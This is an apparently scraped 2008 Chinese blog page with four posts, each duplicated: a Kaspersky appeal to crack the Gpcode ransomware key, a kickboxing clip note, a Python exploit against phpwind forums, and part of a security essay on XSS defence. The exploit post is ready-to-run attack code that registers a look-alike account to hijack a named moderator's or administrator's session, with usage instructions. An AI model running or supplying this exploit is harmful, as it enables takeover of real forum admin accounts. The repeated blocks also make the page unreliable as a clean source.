感谢www.ushost8.com的友情赞助
卡巴斯基征集力量破解高加密敲诈病毒
[
2008/06/16 20:51 | by huniao ]
近日,卡巴斯基实验室宣布启动名为“Stop Gpcode”的全球主动对抗敲诈病毒计划,此次主动防御的目标是破解病毒Virus.Win32.Gpcode.ak中运用的RSA1024位密钥,该 病毒是危险的敲诈病毒——Gpcode的最新版本.Virus.Win32.Gpcode.ak的特征码已于2008年6月4日添加到卡巴斯基实验室反病 毒数据库中.
据悉,Virus.Win32.Gpcode.ak是Gpcode病毒的一个新变种.不同版本的Gpcode病毒能够使用不同密钥长度的RSA强加密算法加密用户各种类型的文件(如:.doc、.txt、.pdf、.xls、.jpg、. png、.cpp、.h等).一旦在计算机中加密文件以后,病毒会自动生成一条信息通知用户文件已被加密,并要求用户付款购买解密程序.而新衍生的 Gpcode.ak使用了1024位的RSA加密算法拉进行加密,能够在受害的设备中加密文件后会添加一个._CRYPT的扩展名,同时在同一个文件夹中放置一个名为!_READ_ME_!.txt的文本文件.打开该文本后,犯罪分子会告诉受害者文件已被加密并向其兜售解码器.
目前,被 Gpcode.ak加密的文件还不能被解密,不仅由于其密码的位数增至1024位还因为在其文件的执行中未找到任何差错.因此,就目前的情况来看,解密这些加密文件的唯一办法就是使用只有编写者才有的的私钥.据估计,如果加密算法正确执行,一台具有2.2 Ghz处理器的PC机需要用上大约30年的时间来破解一个660位的密钥.Gpcode的编写者花了两年的时间来改进此病毒:之前的差错得以修补,并且将密码的位数从660位增加至1024位.
卡巴斯基实验室的病毒分析师们通过深入的密钥分析,能够对该类病毒使用的私钥进行破解,使得卡巴斯基实验室成功地发现并防御了Gpcode的各类早期变种.到目前为止,卡巴斯基实验室的病毒研究员已经能够破解长达660位的密钥.然而,该病毒的新版本Virus.Win32.Gpcode.ak采用了一个1024位的密钥.而破解RSA1024位的密钥是一个极其复杂的密码学问题.
卡巴斯基实验室诚邀各位密码学专家、政府研究机构、研究所、其他反病毒厂商以及独立研究人员一起努力来解决这个问题.卡巴斯基实验室已经做好准备为愿意参加到“Stop Gpcode”计划中来的各位专家提供有关处理情况的额外信息,并展开开放式的对话.实验室已拥有关于此病毒的充分信息来帮助各位专家展开破解RSA密钥的工作.
欲配合参与到此次活动的各位人士可以访问我们为此次活动专门创建的“Stop Gpcode”论坛,网址为:http://forum.kaspersky.com/index.php?showforum=90.
如果您的计算机遇到上述被感染的情况,我们建议您使用其他连接互联网的计算机联系我们.请记住不要重启或关闭疑似感染的设备.请将邮件发送stopgpcode@kaspersky.com,并请在邮件中列出以下信息:
感染的日期&时间
设备被感染前5分钟的所有操作,包括:执行过的程序、访问过的网站
卡巴斯基实验室会尽力帮助您恢复任何被加密的数据.
据悉,Virus.Win32.Gpcode.ak是Gpcode病毒的一个新变种.不同版本的Gpcode病毒能够使用不同密钥长度的RSA强加密算法加密用户各种类型的文件(如:.doc、.txt、.pdf、.xls、.jpg、. png、.cpp、.h等).一旦在计算机中加密文件以后,病毒会自动生成一条信息通知用户文件已被加密,并要求用户付款购买解密程序.而新衍生的 Gpcode.ak使用了1024位的RSA加密算法拉进行加密,能够在受害的设备中加密文件后会添加一个._CRYPT的扩展名,同时在同一个文件夹中放置一个名为!_READ_ME_!.txt的文本文件.打开该文本后,犯罪分子会告诉受害者文件已被加密并向其兜售解码器.
目前,被 Gpcode.ak加密的文件还不能被解密,不仅由于其密码的位数增至1024位还因为在其文件的执行中未找到任何差错.因此,就目前的情况来看,解密这些加密文件的唯一办法就是使用只有编写者才有的的私钥.据估计,如果加密算法正确执行,一台具有2.2 Ghz处理器的PC机需要用上大约30年的时间来破解一个660位的密钥.Gpcode的编写者花了两年的时间来改进此病毒:之前的差错得以修补,并且将密码的位数从660位增加至1024位.
卡巴斯基实验室的病毒分析师们通过深入的密钥分析,能够对该类病毒使用的私钥进行破解,使得卡巴斯基实验室成功地发现并防御了Gpcode的各类早期变种.到目前为止,卡巴斯基实验室的病毒研究员已经能够破解长达660位的密钥.然而,该病毒的新版本Virus.Win32.Gpcode.ak采用了一个1024位的密钥.而破解RSA1024位的密钥是一个极其复杂的密码学问题.
卡巴斯基实验室诚邀各位密码学专家、政府研究机构、研究所、其他反病毒厂商以及独立研究人员一起努力来解决这个问题.卡巴斯基实验室已经做好准备为愿意参加到“Stop Gpcode”计划中来的各位专家提供有关处理情况的额外信息,并展开开放式的对话.实验室已拥有关于此病毒的充分信息来帮助各位专家展开破解RSA密钥的工作.
欲配合参与到此次活动的各位人士可以访问我们为此次活动专门创建的“Stop Gpcode”论坛,网址为:http://forum.kaspersky.com/index.php?showforum=90.
如果您的计算机遇到上述被感染的情况,我们建议您使用其他连接互联网的计算机联系我们.请记住不要重启或关闭疑似感染的设备.请将邮件发送stopgpcode@kaspersky.com,并请在邮件中列出以下信息:
感染的日期&时间
设备被感染前5分钟的所有操作,包括:执行过的程序、访问过的网站
卡巴斯基实验室会尽力帮助您恢复任何被加密的数据.
K1 World Max 2008-Yasuhiro Kido vs. Chi Bin Lim
[ 2008/06/06 17:54 | by huniao ]
小日本拳王的正顶膝,很猛!小日本这些年在自由搏击项目上取得的成就,有目共睹啊
phpwind管理权限泄露漏洞利用程序
[ 2008/06/06 17:46 | by huniao ]
Python代码
1. # -*- coding: gb2312 -*-
2. import urllib2,httplib,sys
3. httplib.HTTPConnection.debuglevel = 1
4. cookies = urllib2.HTTPCookieProcessor()
5. opener = urllib2.build_opener(cookies)
6.
7.
8. def banner():
9. print ""
10. print "########################################################"
11. print "Phpwind所有版本管理权限泄露漏洞利用poc"
12. print "Copyright (C) 2006"
13. print "jianxin@80sec.com"
14. print "80sec是一个新的致力于web安全的小团体"
15. print "http://www.80sec.com"
16. [separator]
17. def usage():
18. banner()
19. print "Usage:\n"
20. print " $ ./phpwind.py pwforumurl usertoattack\n"
21. print " pwforumurl 目标论坛地址如http://www.80sec.com/"
22. print " usertoattack 目标拥有权限的斑竹或管理员"
23. print " 攻击结果将会在目标论坛注册一个和目标用户一样的帐户"
24. print " 最新版本可以使用uid登陆"
25. print " 其他版本可以使用cookie+useragent登陆"
26. print "########################################################"
27. print ""
28.
29.
30. argvs=sys.argv
31. usage()
32.
33.
34. data = "regname=%s%s1®pwd=@80sec®pwdrepeat=@80sec®email=foo@foo.com®emailtoall=1&step=2" % (argvs[2],"%c1")
35. pwurl = "%s/register.php" % argvs[1]
36.
37. request = urllib2.Request(
38. url = pwurl ,
39. headers = {'Content-Type' : 'application/x-www-form-urlencoded','User-Agent': '80sec owned this'},
40. data = data)
41.
42. f=opener.open(request)
43. headers=f.headers.dict
44. cookie=headers["set-cookie"]
45. try:
46. if cookie.index('winduser'):
47. print "Exploit Success!"
48. print "Login with uid password @80sec or Cookie:"
49. print cookie
50. print "User-agent: 80sec owned this"
51. except:
52. print "Error! http://www.80sec.com"
53. print "Connect root#80sec.com"
2. import urllib2,httplib,sys
3. httplib.HTTPConnection.debuglevel = 1
4. cookies = urllib2.HTTPCookieProcessor()
5. opener = urllib2.build_opener(cookies)
6.
7.
8. def banner():
9. print ""
10. print "########################################################"
11. print "Phpwind所有版本管理权限泄露漏洞利用poc"
12. print "Copyright (C) 2006"
13. print "jianxin@80sec.com"
14. print "80sec是一个新的致力于web安全的小团体"
15. print "http://www.80sec.com"
16. [separator]
17. def usage():
18. banner()
19. print "Usage:\n"
20. print " $ ./phpwind.py pwforumurl usertoattack\n"
21. print " pwforumurl 目标论坛地址如http://www.80sec.com/"
22. print " usertoattack 目标拥有权限的斑竹或管理员"
23. print " 攻击结果将会在目标论坛注册一个和目标用户一样的帐户"
24. print " 最新版本可以使用uid登陆"
25. print " 其他版本可以使用cookie+useragent登陆"
26. print "########################################################"
27. print ""
28.
29.
30. argvs=sys.argv
31. usage()
32.
33.
34. data = "regname=%s%s1®pwd=@80sec®pwdrepeat=@80sec®email=foo@foo.com®emailtoall=1&step=2" % (argvs[2],"%c1")
35. pwurl = "%s/register.php" % argvs[1]
36.
37. request = urllib2.Request(
38. url = pwurl ,
39. headers = {'Content-Type' : 'application/x-www-form-urlencoded','User-Agent': '80sec owned this'},
40. data = data)
41.
42. f=opener.open(request)
43. headers=f.headers.dict
44. cookie=headers["set-cookie"]
45. try:
46. if cookie.index('winduser'):
47. print "Exploit Success!"
48. print "Login with uid password @80sec or Cookie:"
49. print cookie
50. print "User-agent: 80sec owned this"
51. except:
52. print "Error! http://www.80sec.com"
53. print "Connect root#80sec.com"
安全幻想曲2008 (PST By axis)
[ 2008/03/25 20:11 | by huniao ]
Ph4nt0m Security Team的webzine第一期的序言 PST webzine第一期下载见附件
==Ph4nt0m Security Team==
Issue 0x01, Phile #0x04 of 0x06
|=---------------------------------------------------------------------------=|
|=----------------------=[ 安全幻想曲2008 ]=---------------------=|
|=---------------------------------------------------------------------------=|
|=---------------------------------------------------------------------------=|
|=--------------------=[ By axis ]=--------------------=|
|=--------------------=[ ]=---=|
|=---------------------------------------------------------------------------=|
我见过的大多数安全人员,都对技术有着一种狂热,甚至是一种偏执。这种情绪在做安
全研究员的时候是非常有好处的,因为作为研究员,可能要偏执考虑到一些极端的情况。这
种钻研精神,是光靠勤奋所无法达到的。但是在甲方做安全的话,可能更多时候需要的就不
是狂热,而是掌握平衡的艺术。在商业利益与安全性发生冲突时,如何处理好这个平衡,是一
个关键。
举一个简单的例子来说,眼下最流行的XSS攻击,其修补方案从总体上来说,大致可以分
为escape output和filter input两种。对于狂热的安全人员来说,当然是恨不得把网站全
部弄成静态的,输出都采用escape output,全部输出纯文本,就天下太平了。然而现实与理
想总是有差别的,首道难关就是网站肯定会有些富文本的需求。
==Ph4nt0m Security Team==
Issue 0x01, Phile #0x04 of 0x06
|=---------------------------------------------------------------------------=|
|=----------------------=[ 安全幻想曲2008 ]=---------------------=|
|=---------------------------------------------------------------------------=|
|=---------------------------------------------------------------------------=|
|=--------------------=[ By axis ]=--------------------=|
|=--------------------=[
|=---------------------------------------------------------------------------=|
我见过的大多数安全人员,都对技术有着一种狂热,甚至是一种偏执。这种情绪在做安
全研究员的时候是非常有好处的,因为作为研究员,可能要偏执考虑到一些极端的情况。这
种钻研精神,是光靠勤奋所无法达到的。但是在甲方做安全的话,可能更多时候需要的就不
是狂热,而是掌握平衡的艺术。在商业利益与安全性发生冲突时,如何处理好这个平衡,是一
个关键。
举一个简单的例子来说,眼下最流行的XSS攻击,其修补方案从总体上来说,大致可以分
为escape output和filter input两种。对于狂热的安全人员来说,当然是恨不得把网站全
部弄成静态的,输出都采用escape output,全部输出纯文本,就天下太平了。然而现实与理
想总是有差别的,首道难关就是网站肯定会有些富文本的需求。
